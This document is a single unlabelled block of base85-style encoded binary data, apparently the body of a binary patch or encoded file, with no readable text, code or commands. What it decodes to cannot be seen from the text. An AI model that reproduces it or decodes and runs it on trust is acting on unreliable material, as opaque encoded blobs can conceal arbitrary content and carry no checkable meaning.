zMNu?hH;MNgE><|)^<=Rp%#+BCij9#5zv@$)R8x{?y?1rDUu&d@It3&DlA^IDqkyMn zSn|qS&xvL=Q14r{T$;>?QcZ4FQD#k~2JAT?B$Zx_IgG}QgM1Ib(8vj}am}DgI2YSk z5?dGFuTrN-Ra7E^XO7sBdb<ru$!ZnG32IF1F%@WMGJyuN8;sb|=474rv`V;|zro1v z95`gUSYcTIYqU^hj(>uXrNLf;o3Ezb7gc$Sh_E29tD#w8Gr^u8;<1Hx{m?~W0MN?X z>jQ_ASTU^FQlSXujO!@hi|Hl#xb)fn4XY@?Er2<jaH=vPY<G1fsmwh>9u3!?U^DK& zVaKmAQ5!*0IPsL|^%ETd+A`HJgHpOpiD|h-@EE`qq_IEq#Jr}q)cI8zXv>GpI+pDr zhS69fKl1(}G!ps}R`@n}W}<RE3J{#VEt4zL3kN%!cJ+;6boC9dam^aW##h{t#{adC zo0HunL9Wfa5H}&2UuVm5+UTe*U73R-N*S7vP#aX{HBxV7r-_a?PH|^yJ7C<q25%wP zm-oFIi7Q?-V{f`rc7ZuxA5lV)bH*bZ%CVU-tOo%0EK7qVrPqKCvZ4Z&0FWtJ70#O{ zToN*r)CwnAXzPi%mn${C^-73a+rq+qrv@hkm|52u^zdAo4&MtJVJpw6v|N>+#$&fd zY1!&`gI{B!z08$~?TKxmNH(H*)IH_M^|N^qZ3ZUdC$5a?c4cEenRFg+?xo!dcto;} ztcrSZdUHKFqX$Rw2<hGs0Fri4Xo|1;+%T^UPZ;=QOSAIzruuv`dC)zxOh^Y|^V7dR zN{?`h2z2W}*K2=WN&n&s2)@IgqcA~D=7LfX8-l+DKMMBPf!+*^1zbwnI`4jv7?W<B zH1yDfTK|(RCC<?45e((Y8>J5QzG{nUgeiD$ndy?K3Vg5PW_!!T1Nc=nafZ^z49Ta~ zx4!9GAWXGDgNAJNrsn_T03j54Z?nRu3>0-g;}anL==P8%(spc#1I`yV7#}yeCczMu z2gEOBPmXoS1b)f+5-9FMk>Ve^;BOqO;l0CN(!|ixa@C5k{%%<{%n1(F)BG9cppfm~ z8j?bNNYMP$mbrP*3s}Cm>V%DM+T#heJ06&boO$EhJv5&VUQgI^--Gxz;^yVH3ms>s zldd7Td@StzU3hKOYj2HqS4#3#60U|crz*BhdZn*jLg4hu5;1B*OQV6^UuCQ{B#mC8 zCYD=@rA_SJ(t3UOT4=R{vWb)x!G|{LV)=<ppLcjIAu^GT2p~JbSx_lR>9vl`ttea+ zUZrokzywxFWx~0iiIF)=Qn%NX!a@K#%Nnv2c%y&AG;M@*Ss{S_3|cd!3dMi4d<X8p z*sU0`zpZ`qAycyr<?x5SoI&^-b<oEwfKOQt%vMKKMJJB?$E#VPo>)QJ)voc@5O$bs zmG_lSM>yVqfQ-1>NCJ?rJoEy?2Wktxml=0_iYJYPtzO&pq%td;@I(T3Nf;`03;hF_ zAHe<q?g#KcK==XT50HL<+#+;~k}&&U4onxf$By<hk90D1yB`%F@Jn`p2?<~?IK&^` zO$SHW4;Of<hJ{i14z_&MK141r&EmAZCCmF~G{<@4TG8Kw@_9^K9i#sCtuUgV%2d`b zKli}DTB9#Lgg5Bb_Ld0TqmXOBtQf(15wtku5*Y7k(ltutZcF4CR4s`KVJXuU)$%!s zTplRTx;`X6r8WQ_@Wj-UYOI9m>TEF2sVx}y=cp0yc0=%}_Cu$@8t+L8qrBiKqy@O+ z--dLb6h*{jR+a&P%P|&1r{=U=y~!{5?cR*+#sg{H@Xv$W1>&FVzb!Vke~x2ZZwbvZ zpL?<Ecl7+o_&ff6XG%(hE|mi&fKh=1X;HZuVzWW4ov{#hh<SI6qWzPM6BN!9jQMoN zLa}3CVE@l$8HzWE+JZNTMiu$ry(p=O-tfP2yq_BAQ1<`%poY+&{;Su90*|7%0FPpz zV*TgG+`;hp`p=5r!W7W|&zj@KV*jt+n+n5^<@-Ob&~SdNA7K9g=Lfhy!21DyOE^El z5aWL<l<f#YmF);yl<kOA>HqVTWDvEKWDx%}S^a!Ni^(#vYQ=w6TM)@&^?(2Kaabf$ z#?N)ln3~B<N&<)xh6!du5?_8q({7a_p{5ckL+YU7ANpuT-V7f)`OIX7htC#A`SM{+ zG`e*GK>sG~bbJ`9m3wdO;uH`k9AoSw*1ByN?NFgOP!~iq?L^}pLo%ahZZ->6uR{p> zvkx)kGE8X|%C1FO?(AAZBT6AjpB^Gc2m7{%hBUlxB}FNVv87)3=q7Qq7Wb<7`mVpG zvP694DXZ%H|8JOOA;tM`e?lkONLwb^$lU)|W=&j(tYh=PM+7Axulvsz+Coj<(n3u! z`oFdEAUcY~(f>9F>ye@b>yc8S?7#I^IaC4vjrMK1D5QejN5%PxX|Ohifg^rm8XH(3 zAUq(TR3Q&0d_b}Wz+s&O>2v)H4RS>PU`jo)@jL(xJEfQ&he$k#Vt~oiUPv}+DxE|< zq29#y^U6nZEF!zQcPYPGYKwns+GC?2v+YieiXQq~vmd-39QsZ;?W1gFN$M_LRh`Hx zWn5cT29;`3Ja-a@v|;CTk|zunCgsiNK^S6})=nL39#BTBj>O7M(F@#MFEE+)@R$9N zB&_U)rRcu)+NoF_iixzrtVo?AXi^(Gz^KSqOSLpxJCTJg6+!3vRu<&DUoWBI(H5b= z>@fD-XNFtONS!UV$~b<?FUeOE#!Lc<M`mn7Npq@=POJ))yDbU9*hR0pDA+T}YnzV$ zoL`YT6EI;b{M${Lvq2}a%#DP~Cg3zhnHi?5;mY>?g(rt)GIHv%<LvUc2X6=6H)%Dx z&cG=}Y1yyRh|LOX!C3cRS2D?UY>+Cs0OYFsR;OsNBWgo~yC!Db-x#bJFkEvHb|__4 zqnUU$2Ld7&g`>+!8wjsJrO7v6&To|YK5|wW3IGY_qhl&OQ>aH!Ix(i=V3@o{LXR0* zaKwWykVY66EasMEI_s+C(TeID@j34E08N?e)hU0$)Oqie4>7>}J!XOCXEzOPukvZ+ z!@FjtI%Y~Jy;^CDx6g>r6m71BBTa4)oL?tTfgCM@zFg@HteLs~rc^Fk>1fqPvEMI6 zYQRt1)z{hc)950^oh8YK5UyMK437Iy2cF<Cs%(XG3`NIzylJI#mQ^I4C;C~M&GxmC z=!q#{1#MTr_o`{zRivdwqWVO~yeV;cCTX<)#xaUkl!Xr`+R74XTKaq*tX;wRenzG= zu6IZrB(j4Sr_NKdMt=uI&&fUwoF(1&4WMOa$Jy7(Y^AK=f-LM!TM}ezO>8BPH_zyS zT;<`@QRhuDV1{4LqX*ggOF_wpYE3%Hx@w>35=1<X(d5mfAqKa~6AlE9_t7Si7zlAo zVD6=VH71?fx?zk&C3qNBe>oLpQ-%BMGXgl5Xw=9^c8^5nv<a@R?FeK>!M{2=5`Z4; zT;@0LM$awM08jlSQx_La?xL(dS4jVEKZ&xY>&W~Pp9i$rtUK?Yy<%O>^3busGj8|N zh8|;w%V_m{o6H)m`Oo}>3Jb=xc%Q2ARCWbdC=!Tjh^IQK%nZzIS<7In-~gnCuG)>h z+abd!l&p;u#_X;`@RAL?vnzIf2aqNsro(SDz=PGGrih*dhj@Arl0y))hu~e7Cq8Qy zu<lGNN;fE%)+kLlPt=eGt&|Du?&#$9dJ91)|F3$-XfElWN!8pD`$?XYTz$E%?cwyu zl7KW;o`>7p`_SPjF3)Q^1nrBZ=GSV9-Spa78>}`vmSl9~bLuju@)uDw0I>eqV%R4; z33>pgeRvOoP6X+@vhof-w4ufnnl^$VX<2;fTH#`)W#8nuzNm-?f9OX+Ta6`f@{E-2 zA#=v}I@tNT+jp=O#N6fee)X^%nc1<eFkR3k3HjoJoD6ydNoi3-Ypcs!txl-pKY(Wl zLd^@YIz!rytx8xq*oE3h0Lb$+U-1=9oYG<<n}8ABF10lhqxNV$)g8rS<inf6L+qBU zpl!66p}@{s)j2k`efHdKj-q1w2#k593{plBBvh)!fj3sLuUW>jHOn#@aYceI*}jf= zs)!>(rCeChUqv_ItVj`|?UZYM`Xh&b0r!X2g^O=HA*6SAw(q_m6<`a-Ifd%M8<yzI zMEtW?p~15;HC)>clqX*YJzCv~e;O4p|I)vIr@mqdZ!`U^F{Qq1PBJAud_TgkZw_1O z;bZlcyxFhbpoB+hwG(7ph;TNb(S4tq0InG)Hy|{QAUIa@Wrh8S!-?YXtkQ=cVb6nh zQx*$r^^dkVz@2f$AgR=)#9POIlFdj_H@Cv9_p|Fh`~N1cKj(H!MhvwyH0b|WN2%2J zQ2(9fM-#sy41VS${8k47`uRxR@?gSF1<#{K2asLn_{m&wta3c>4c6E@Y%e{{tB{!1 z6-yCFuR6_tTyy>c5{_uj)O(&&Ll!n<!h$=(^=^EX^81Ufp7!SqO`xDQY+>C~CuFD! z#y+C8+_ikq6%4RomGAa-SCQ(+?w|Md`u0GJ)!Bx9dV0q4qVbuRBXCY=Yd<`J2UK3G z1sGQMER$S^EVk1AcMC0%+};k?d0s0uQ1k==(@jBp`N%o3m}F2Mn~B@NBu!!DmH7|E zAqCw#gfZ8}0rP7+xJ<xK<y#~a8Bt3jktOTAH!)|XIo=eA^2Ud!%22wC7M_qTbB(6j zFQC4T8FFXWHm^`IE>ygXQk_fQb;gHB2@o3itZ?(;Fx;?Bxq=Jaj|(M46q(Ox)*Hto zxfg<a-#UZp2j4{z_17cabe<`_bjze4IrTKCSUKPZyV;;uY$Ik$=ywM&2p-n&0YT<I z0^mo$xJI&uB&EYnI8@klB2z?$SfTmvsV;q@)-(P`y!`nzu51ggQ6#VU<m5B@0l=Ni zBg23UsvoE|f#Z9?FQTdxBX(V&y3Q?z+*8Pc%hXT&H??J_(jDEu!<g+l=w;&=Mr}}* z5Qc(*(yF_p0}?ZwyYx*nZ1lcU@39zX*p-(mnu0fxks9AplsJ|%!YLw*4K`JL>?%EG zPB@-0OGF*N<|$4tL24T7N*`D}lmSwY(d~5ozRdaAtC$Fo#n@Ng^htWws-W?s&P>ln zaN|NNY&jJ|TZ81^u%672um~R+tI%IC1zBf%JUORxyU7We6rQ=V7RbFR<Uen_yptN; zBRjEE4~Z1B*y9XO#EsC)2lCr6tl{XmwBcg0?$22X|9(V*HpqCFeU}*g>IQ%mbJIZ- z3+A8vdbpH<{|X(#DQD{mrV&8>6Sb;UMUT0KjPa6l%z02W=HnA~Qu4%iDcZ;p8>wVi zwB4op3bk;ZrSPvUy$S|)2OyrbuU!Owq(691!<EJ6{+kMKG7*U#wEJLHf0b5_6>gC! z6&PgU+`~xiZ~Zr9VZKkCNDkl|8C-7ax^V>CiD#}O3a||ID|*CQk-}*~jSU|i$4Jo; z4`y4(u&>+f5DcAw|Ei9LsiRqv%l4!&M073V<n-H)#2ai)&jOsCugk|gG}dyLWI%`q zR;;Hkuz7l5M9j0LujQ<wRjtc4nGBH-19mW;dj-N7Sj>~2>`*SnEDKO%R#DS{H$QOg z5#ze#0!5YLBt{!_Z4&pfjB^p33w9<MNc)UcnEcA_)9;Cnm(s*WFnoxj)jbOPQHVfN zb3nhw)?(j5j=&brd=pNt)#Y&c!-<tpvu9L~8RQq+Bd{Y01fw>rYghd$$Tc|MTF701 z9}-pdX&-3;&zD7nO#++<Q`KhIrfTwJh|NQ1=3A2K_sImlSfvqdWP(TCTGRrx^Uq_x zgvfWDaenuWD9}#0iv`0oXUwna6mbRKw{sKA;;{xH(mTOb|I2a2F8{}0594urzj3cq z7_ShpMGDS`p5m1-l$-$ysh<qf*xp}Mc1EFE->#CEtZOFoXAV#XL#s~TNTY16cB>M* zFrBV5Y}E-S3|6yKcq9&iaqAqw+UNcP<frr7sa#}em?B;~5Ea;hY?fH2UdHTH4%IRp z9%u^KwrvJ^GSIQ_3WqArt~?9f3BhNafBykxWC;A9rbfl9-c-MucsdQM8>%L(p04&O z-$+jFnCB7;mNFpf<Yr6sD^P^IT~~Lo#Q8$|Dlu3DK9LK=Uqf_A&!B&=w~o3uX!0nk z9xjU1Fv61{*c55ee53_2JQ=k==h2jo^mLM!wV#d&Tjhpk%3fu)nz~v*ZKquA);2lh zci>!FH#yUJS=D5vg`~YsCVmO|5K4*}M`WK&OxV*TvOYjn#X%BZiq{5AwA#sLs>vYk zsaPa#n3d-~XAzeDYSFHm*J%V(N`TdACt~y58SE$o;&EOJIQrG23MkN{iino?7Sg2+ z>Xa&}rT2V7um^E9!*H7Jdd%Ru+G&SwY&;`Q(<vb-8e7c-=4|t6;qb7uvVNmNF`ZZ8 zNAUacIv>F78EcLZx==f*op+k`C)~*js%DJui)k#d9$~1rU8Wz~^0hpmrV?>_+V3p{ z@P1O8b4;kHaa#Gdz<JrFza7_@1B*^nK^p}cR)3?BtAC4JJS4dXdo*w~T0A%4QOF~V zpNrp7^2cyQKyv_n#m(ANWPGNY@`V4~V`pG(As-Ne1uc@(2PM&@bgI&azp@by$>)<> zh5vX6r1(?TEd50tPEF))*t}0+*YqJ);<9s5>x5<Z5=gDUw4o%=AF{`8{x{>`L>Dn} z#)*HjYA;GiRSm+Y2K$%pZ*{hjra%6fW{aA8Kl!g;G}KD#5t^z=z+d@i0^KMNpHR>! z{VRZ*FEs2!{h0|<Y#$Ct2QVEC8rF_O=wi@^h4u`<OqG-G23KHdK$!_lfGx(+DFz=} zUcVhVwBw1?U6gtOg9WNiv=>RuNpgvaD7LliDYn5fdF2Lz?SKlii=2J`C{n7gM%y6o zEQvLPvuQ&E!uDGCmJ9*6F{bZi+@bDwS0$k8Vp7o0&-?A@la~;C`25n#EsPdgIExO1 zFz+4jWMh017(tV8j|?GF7qU;3C1|;}LB9uW=&!#o;O(B;Xf)*!NZtm4x6!f5rHZ%{ zNS0|<97ytnW2}EP-d{I}(K;Qa(~-?APSh2q1kba}YIW38XU#cT?N&@EahCuiU>mSJ z<vybo4?!;|D$cD!X&c>7t^P|k)h|H_Pa+O|=+w=<2z1^=$bqx6PG9jg9nCBu2k-O# z^1VQ_^SnMEpW`APw02@W@mcT_4j)Yh#c=|=_8Wt90Mde6d~c2P+K#cDX8Xyoj#E|= zkC+IjF92ok@o0nh%DAK8+f?lPRRbVadD%pzzThr)jZYkLZU0VgZyfekwB?b~TWLAD zMY>#F?yC+xpW#FgBUnNG@$>tp@p77MjP}^6VeAx(F0Zxg;Aq!Ex9)?diVNck*yjiz zY}KtafXvbRw=9~+(q^RH!$VC!wK$T(2A)Xljnr(Krq34ze(7G`dpB({mH=u1-amxv zwGPLnqinqFoUi>)#hTW~^u{}@C(q3F<F>A`9R3-DccEkQgd&ajnk_=YF0Yniy7lt| zqhGB`-w!VxnyV-qa$C#|4Kp9Ga@GnH^X;!-j!aY2S&z{75L@zD607oUsthH(QMxuo zVU3lB@`+G@Q5yh1?qV6h6p*AYJVh+4EUGXw#-@Dq+eES0YU4l+nfQ}6y|A#95m^Hy zX~}&DfrcqJD-Jcy{#PB|u7}$K^gJG&fZXU<9X^<noiGxjG!seZT)7^)j#2Lg#s<`l zu@F-z(JkzY08X^E?uhinBb?nBCe!;&T$#H#7hC})AIph$Q_zYmEr3Q_fiZ&39X`Bi z-(H0gBk895FlUV`jw$UpqLFof-O=(DM2E~EY&KPGx;z!rmj;irv<MJ&%_4LT`=NH{ zPl4tR#kap4=kAOmOBB{{C?+B-^QG0Rp6mYif?qXOJ%B&Bd+q3t-Q$DwuSG{5Usja< z6O#a=>x)Fi`e2o|3V@!k`c^q^m3@Dsit0=oGKBdJ`RaA<yr^@p?3%BQ6&H_#yru$s zYc+`@=o<D0aRSoH<8i@Xe@}W6ft+b!@?PDSZGbTnnCrNBvkZyS?s7YVMtrv+qhaCJ zq<S;W3v_zY(m$Pw{u}MQMBN57>}k^1((nZJGL5aPt(HQmU4UGKUdPX1Tom|iJ(hkZ zlJRhj3n)VQa_uV-40uj=?OqW;;oOBe5FC&MhSsbCUHEgsX!Sl6XLw7s)!2sDc+OI> zgeFhB-{{8?vFLdo2U!MAaowt%zYo?VH;D73Ti$&7QSd>G)l1weN>;LGMy?dFGz^<r z{9dQ!*xXw*FhHw5qmibkFaV?<cRd$ogdC}RSJ)GtA?+D)OI-2uHgr>kZFz5@)F5@^ z0YA|9^Kk$!7fB-8o;Ce_=j0Fb3OD2Lp>D(BM<*K>ub$t_yO<0YTX`On4{fq-CNuam z0NQ(Kw;bOixJ}Syi!sc$j=kx$qwe_gs{m|qb5FkYHUKK;OUElygF@b=Js$Z4`tkC1 zWirVIJVJ+Hz-L$K0<34)?Kj8;zR=%551TiHsO9P2&(SR}*A3|<$`@AG6E5aw&?>Jl zRv-^Jo|8$f7Oj?5T@rzsZkHhSSyz<6JF5D1cVFs^81rxh*qRvhE)denN+EI<Ah(c1 zSf{kX9zelY))z!Eeu;VOyeoJ!t~Q)@3{MNf$16G2Axwj#mf^5diKqfiG&Be}2q+<2 z#Wc=84xZsXmdW7Q@iGV6e%!^(>LZt^L>2+PO$i4f(d(Soq>K_{?0J_c4&gsW2|$;^ zI05PaZyYJiTEjZ~YhI?KZm(hz{t1#wC6HV_ae%0FK-=jQD-8FrTE=q@0S-RTa2k;S zB7g1!)w%f!EYVQNKoi~#@BP6T7)iPq%Ch-**{;$ofip~WgSpKZYAw7A|G=Pr2=Zvg zhC=K5P*7WcIEk}^^_LAraUNGqN8yrdno{l<#2-U8o3vw|Xc?2CVs#1BU8KgLx{!vP z5`a2{Dc6XG17G>;x(IQ_C&3c&KdY;jaGYv~HflttRoF@%;~H$dCZO~Yqk&xp3jJdL z?|xv(Lq*6c`Jf_fMTM<QHbxkT2MBXbM)|uEogKcIc~hIX6Y#nI&UlJJY}u!n!v04K z>!I?l$oA{>Q@LIFOdImC#__Rk`hCmXae%Re@Ka#Kj_*FFv;+_Trr%x|Zq|b?8Zp0n z5isjVgwp~+#5_{ezSyH@<4>{BmOl-lOhqFNm^&*MUPr-vA`C^(piXUod&vu7VMMV} zl4TPMHJ*9~cQ|pErdFRqip2|2;n3yGwIR$#?T3s$82I*-*(3e6hul7FXzmCO0(gd4 znlj&Mpwj=>ua`=tZdyeVatN;l)o%UpfmhJ(5^>X|OJCBS`}<M=yR^p%$~9NRion>Z z*JFK@j16BsqIVsSqBMamZV_1g3)}_>Gt6M}+f0TTZn2I)w98Z2PDnL2FSi?X2%S<- zXcD$qq?*#0R<4d~z%3;t(@W>M6)?I3+9BT<Eg}<4o*m^gp{8fwug=O!gj-w4f1KiC z?R?yVH3scGf2>6jZ3=YR1;#d3Vlgxhz7Qh3+}Ho%jTk8xpu4|{?z>D_3$?&+W14jt z)F7tbuYzCs?>q5}A3(g=hv0foNi+%y!Ed<Y*5ri7<+9=;uhm=jbdp(O2=Gb8#Q%i4 zue(cWr`z2LHZywnt>3m@cgFv;8~XL7asjWg3zzMAy>ss<QWbDAQ#Lm{p!KQkij;G_ zGq<6$<`3uQsgL@kRF8!DGZv-axUNU<Dzzvge}7;1C0I_5h^a#Fuh*3w@8i4vAXDE& zfYOl5OnyuBA7;Y!b{p)KRscb5q_oMmE4w`Vq4?G*jO^@f#X{1)X6;um(~yHhErb=p zzs7Bc=|m;4)_)KE?xjGs5>Y%kCAO}ur+=UIa6veZ@Is<vY-yk*BMO1ZlQtbE+UFHn zwcI^nAt>;U{mhjKgE6WIu33IR;~2+Hzky~H7<RZ=_~3)g570wcbpZH)|D>@)=WX8- zu7;2mlJR4tlK>gC01W&$aD7F1Lovkf)MbQbnCeQiC1d>__AU8t7e{UQWBE`Qj*_^} z)=*$A?2738u^q>d1XzsO5cyOLL${19DI=)2cgI+SzWVc5G6wQGvGgc^DFiTnb{L<? zu^Ezzj8exM7KP3Jx&+|GKT!+BzVzgMD!tS>2rgK5+$(i#$Q=)lu(I+A5CoaM?8iFq z__I^r^M;K74LI-e|J1=JB&>kYGmCLT<)X~ULOrUh9}4hbnn+k=0e8F1!Z}-vdhZiH zLw{2NAVCPwxwgraqr^V5D8}XJf*W|X3NN$vO^~{x4v9rsIC6r}HhW{kX^}>vpRi2I znWUv1nVO`TvyMU6yRNbZ)8hn(Jqok+EhAs3zP4TyQdPbUGNXjcji-LrQ)2>v5Q%iu zh+dBiA$v&OLbog18;Z!T@+`m(4)|17(a&J%$f_b1;pU%G3Wdnlkn?BwzJ$6J!2Ti3 zwBhYKiXJ!nTE<;y7J>>Xy2{uiD$7AQJKUR6J)bvEUt*xA>Rrts+=hmxlmEuwESDKk zx8Rn7Il%M;-z;BGJ(GCfIg$iu%S0uhaB7JzIBvWZo;N7HSaIP6y?j~A`<v{Q(FirL za)LnIlju5I6$FNWx13DnO~DnWmW7jW8Pe5(9QUI-w3bI3MW!G(%AL|b+%=mfo_W)9 zv2e7FJ}S<*68AZ@w+5g-FT#Smb8au^LZGEJp|K@PM=@-vp3^9>xRL?dYO`|xF;>{7 z2kV8E<%1Pb6z}xIXs{32DAM6)byvGOUVkU=M4}2VZF}FOI)E?PNd=imw!aUMLk$(I z!rAN;k%y#QOWR5fR6-w2`pA30!sE%zyo+A$*ZEM*&XMBLQH{6ZrOoS9-`ZT`wDUe8 z1&h)icv42VD_!YuUreONHBuu3!hiHhT*#a;H&1KBPZ<x6@o9A*?Vfe{=_ARwcm>|R z9>HJ14xjw(G!wIlQ+{`4t)lUmf3d~|tND$M>;)BiRe6IRLzp*|D-O3*wsyvk9Aj-5 znN6<#Sv|?_^!iO_TOCFa$TR{_JTGtfRam<RCI?n6QppIZUaja=VrNYO;C@XQ<H@fK zUF=(n*`J!UTx{CaYxcsHEDz1r8t^|g-{-i7G(77&*5>;7w0t>F+y&_IZFvyB%~Y5J zm%Vn90Wg^@Z-FPY*qEK;3R<kYWoqmfZISaQ7r`|IL(xx|k>(qa&PPgda0=uj@@=RL zMJwsktz`1%UJJxy?V#%bM7w|g`hEaAc;$1SOIPMHOmDz=uE466Ml`W;YWG2q=L;xF zNw%-yNPhCtau-c5w4dTVloxDGKvNiVvjmv#9rvOM><B7muO&%Wc$QFJ3AD;<QO;zJ zfG-^f<yM!95YaKnW?B@*n3zSBK4*w8+|-O9<~Ypf*$aQz|9!XzIPuZevt(+Ho2uax zFppVEKz=Alvziz^+(@!#l@W_KiMeZENEgG4&VR|7;^?B-l>Rz9yUw+|xdA((KVy}% z_R*+e$Itd*%Ak#F;Ywj%dF}qK#d~X_0XwlwxHU}=BgA)@IdM{t9&m3BW67JHV+bvD zEM>r8XRs_}5{i5P==QF3HyiYmJ<oTQJUchQGIx~^lb4j9osk%g)Y^r1f-V0GR{`Ud z@o0!u*K<nlWZY164zaE(3DiaREV;hT*w40T2$DyH@{8EH%g{%uut2O<d=aA9PoH!% zHOWbxZ73NYt427~+r7GK&^|-dc0!NIP;~Weg~ao3Mk=3SDsBrk27pDuV<V&}EmH{l z+})$d&rzh$wQ>pc%SK;FQ+BrWR_7|vR?3L68imgNS)B#eHfp!-x)z9T^`R@+BdqH% zl~(Vn&lZl@<NF0tBHr#IEAcS|kC(I4u94Wh+sCsoG-4t<Fuxn)x63?w4-7i5*c#~) zz!@8<GD`Oe>M)Ln2r$)!sw82Vw@m)TPe)z(5TY~U+XsX}=*cUVj}Q0fLTwdc_0e`b zQy>h~Y127n5KC8LAhn0X0pzk-E>+{sbYjdU&ude`nQ1%yLygvfSg#EucN@(koK^X0 zS<!Z~D^Hlo(7{FXkv*Q3Fx9&H(gCSWj|Uho7ZtTux)eAI4zP6c;JJ&Wz~G97gT$99 zvA3qe3O&^Nw1Qx{yPgbx$93PwYc>Z!DAP%m#0me+Q)k2h?-TjgLTVdmrpwVHZ|+u@ z!K!4=cKn`kFXTx4$zCIgS1y|l6hk3Gj#Zjf;X8v$J6P40VS9<g5RRyjw-ODR#gIu{ zG*6sGQ!^Eo6A;c?FOhd@4>-#`j&oRb8ZRZuBfubAJp_Xbw^a|AI**p%eOk=!2BY5q z8i`orfF3_WlnC&(Arp;9T_E;fTfujJFCXNc{yqHD_hAzerDsl7+}eQp%bYif)Z=kl znrI{7eW~~eyTv5plhCPYMf0m0Ks-Jb-x-jvCA5G)1t9#Gw<6gRtQ;7qem+IuNqcuj zUfm~C_$gtK40MqJBhdPVA9I`d)Va|ny=V5K0!xa<%rBHuGBia9HBFUAF(#OBMTkLZ z(|f+(3+v#<Ct9=-KLDqD$|0yYUC@r|_R%m*pkv(Xu!ME*TGCZ{SJK5(V92|`#sOcm z?X<5O0(QsEYg@@Igmu#Dt14dbSp_^}<f4Eik~sVj5lJFjfiXpY6S)&Vq-;vyo$gGQ zn1LSjB4^Qh$!cbCWZ&Sk(fV5%M;&M<?dhiL{>F{vD7Crl>O+-l4!%ODW%a#U&Y2!2 zWuc*)%jZ{s>FmXGybm~PF6lK`AM)6|%QIM20DO`n^5)Qu>*W=XQ)&1&3)X{P%Bo5c zJMsY$1u!2B#FSTHGrI(E((MvQANi&o$Sr1|c)i6v1@gwO?!_^iv`E~bE7j_ggzajv zjPyEl_9QggTZ&WVq%w!5zPe(Ahn9B4Ku9hwEw26<Lk}FzJ;agSIIwI>_J;+^v@=~| z1_)d$g?rEptr?xFMB)C6?ODLC{Mes8eRkOLU3;pkFl-o2i`yJaWK!trm^4}Uz$x*x z8@tr3iQ~iZ<l0eZi8qrJ%Ch{rg`O;y`OTNG5q;_a4p#RHYPw*G5@v@Qi%&U5sNxl6 zrFV#>6GcHB*l(K$4Y%wUMVGw&kjIfQ1h}D#@n+?6LcuV$ginj?8ySf_gUGF&E{xw9 z<kXl@GDB?erL~#S!8t^T^K!~Ka@a)j(^`Y+3FkYL?qB>6f;|;X3&xyapd%y}-X<=K zC+(yG*^;yfHhXJxY?-NoyTV>90gn`(V-t|2JW<CqSZwc0l~80+V>mS{?(#pk0Dv$h zAG<{x%D6vs_7DeP$F^oIy0K3dER8!`qhxqCVi~i<2PXR8ce7=tqRM?JjqPGDHW@8m zQvH*FGVbXD?f8VneiHEeB(7%A*}XR7=EOdaW>iq;99RXAaBmjz3D5%T>uP0jSyc{f z{Ps|x8AaH{YU2<Vb>hsb<=KMP;3(>vQ6XtcpIf}_HbE?~lb@NX#Gh&)+mq_@=!2G{ z&_Pvu)y~aWpA_UE88G>{?P6`;=hiVz)$OD<{Exs1GXJtOivR=!Lkk3i`ojouF>$tX zbai1ga<;Q_HL@^caIr1YdDmPYM)|`2il{mpWFbe0n<;#l!R;?7f)ufrBYfu3``gsm ztWH){p3KxZ_3huY8cK$Xn}zZ3)})D-mz6ix!5lxri2LbRUC&BnYPQ4jasgSQSD!y% zpYx-+qF9;d%HFrbQf(uwQR~i@>R##KnLq-XFj8vH^IkYr@fi9v&l>WXOu1mVQ>a*G zIG?%yo{Xke+{7~L-nQORbSlc9CFU@0#J_`m+>1o3Vn=jHCtPZRc=}d2`i>4u&J$<Y z^KJL#WA84l2}Eh1+M??I8xA2RMgR}+>}{u#OA|_mMl)KF_aa;#^x4*pF(Kq2w9jTG z4={eWoyj_FX+G6vh+t7%rHX)!M-(w|+|Jx_Vqac2_2%Dd=KZXya99>hw}YH`QWq(M zIy0s(Tfy}ry-VA!!`RZMm624rKhT`#u-Yp2-vUnL<YV{^;*og~z3ra3mRSj)UnKfH zelemv>0r8b6^F5uk9@EG5L#Lmv>>p4hV)Bec*(tIYJh1ZiepeK7|$jnZ@7BVS!(V1 zBu`Q`yxW5SyiLtntyVPMLO)iVMkZQn;@L?5$WLxjY>>HOkiY9WBP`j|6x+tn>?D(1 z<JOv_g!YVYSDeYHs&bOGY!C%7bS|B_SoxD&zNpyc!6V3BG^iax$3B)xspBUeN`L(0 zn=YM-xv+r`DE-pOjxzxDZrt%BC}L8L{d~l{=eTHr=Lxgg3t5a6V?i^b5_zUWU_)db zF->NhsV?&!g<hOsK@9QE!JgZs!^aKZ@M3R!C6^K9R@Z>BBf;g>)zt+=V!fGr?4F#9 z7aWhkN)BC=uDa3FE)IG?#<-N4rQtk<k&;3V5^-A#cSir(W?X}jHK4<}?&j_O@R8dv zm(}+Ce5UF)5OQovt})kO;8_W#6TOIL@LrmEc%Jx6D`6z<U2~`_uA<&Sx3-%Fd67Tj z--PS9X82EIDlr5SSH%vn!N7KK_->M})&i@2!?8z2FPNHZaGxtxlH4971%AhRdd@EU z;<wKG2DgZ){zCMZAN!uq*`OmUhUGrx=HdP|>3ENIrCr*xFE|Uo(1@YnM)_ZBdP`bL z^gzZA)%Z}-NL`Ebh70W#WOt}G&HTBV!aRg*q|2QL134ol`)(hg$?-=(5*x}iAz6K} z8IKO*MPOkTF~G%o9OBHCrV{iaH6ph)={SFfCen;8(JxY(!E;on1Hyi_=DqT71a-&4 z_LJ6RqS5GQNig^z$ExIb6QM5e!(EVp!Q6y>=$zrUvKshwBm{_VzXmw7^e}Pgoep0Z z>5eXt^m~pPD8ve&o^wwF707qz&<;(KugAoJ#UE3az!*tG-Ey?;i9C2qJaBotwhaoH zV7_kD?Vp-b1l320k||p|E>-;gJcW<S)aG{#|1EEdLVBQRU%g(G7=sGlfp^gYr8WcW z4z@R{moQL*5VQ@jOO&?k1_TMMp}NkYxpR*l`dpF8WjP1{FFLRYN}DcC49d@Z?q85J zxma5IgE2CB^}=LfD*D>0c!*(DW0Z->3u$=bLfYgQc(m56ujq1duYW}zrs2q5mwufl z<5r_=&6#cSOSI=N#)qo%y6(wbD{hK_F_d(P-;*||?ut?1n)j9PJuTbQQ}z6$vlRCT z(GWyjv}6kaxiB}yfhBw{G;yMx1(Kd~_YPZ}GHB5;)YKnRtzrwu>JtV!+TeB*5;jHu zYdT)tsTdmS0<0=9p~n{Fc^^TRRZ9A#Q9yXeD_fMH%q|I12W(C7Rtd5aCt-9g78$nz z5|#tCfID$vRn-$Rmt;UYkE#82=b8O3Aak66biWy}l*`=V=Lq*HM~TcgylisRNR-db z&hy}3)gy(EB3K7ib5W;*#HV`X$81At1MmHkc~^R4#JT+SmoBXD!_uCA?|?D_qairc zHq|a*J3AHUd}e#2`Q2Rg{UOl{R&Gq`RdYz<djyvMCZ|MXndle^De#_ZuMTgS;#PG$ 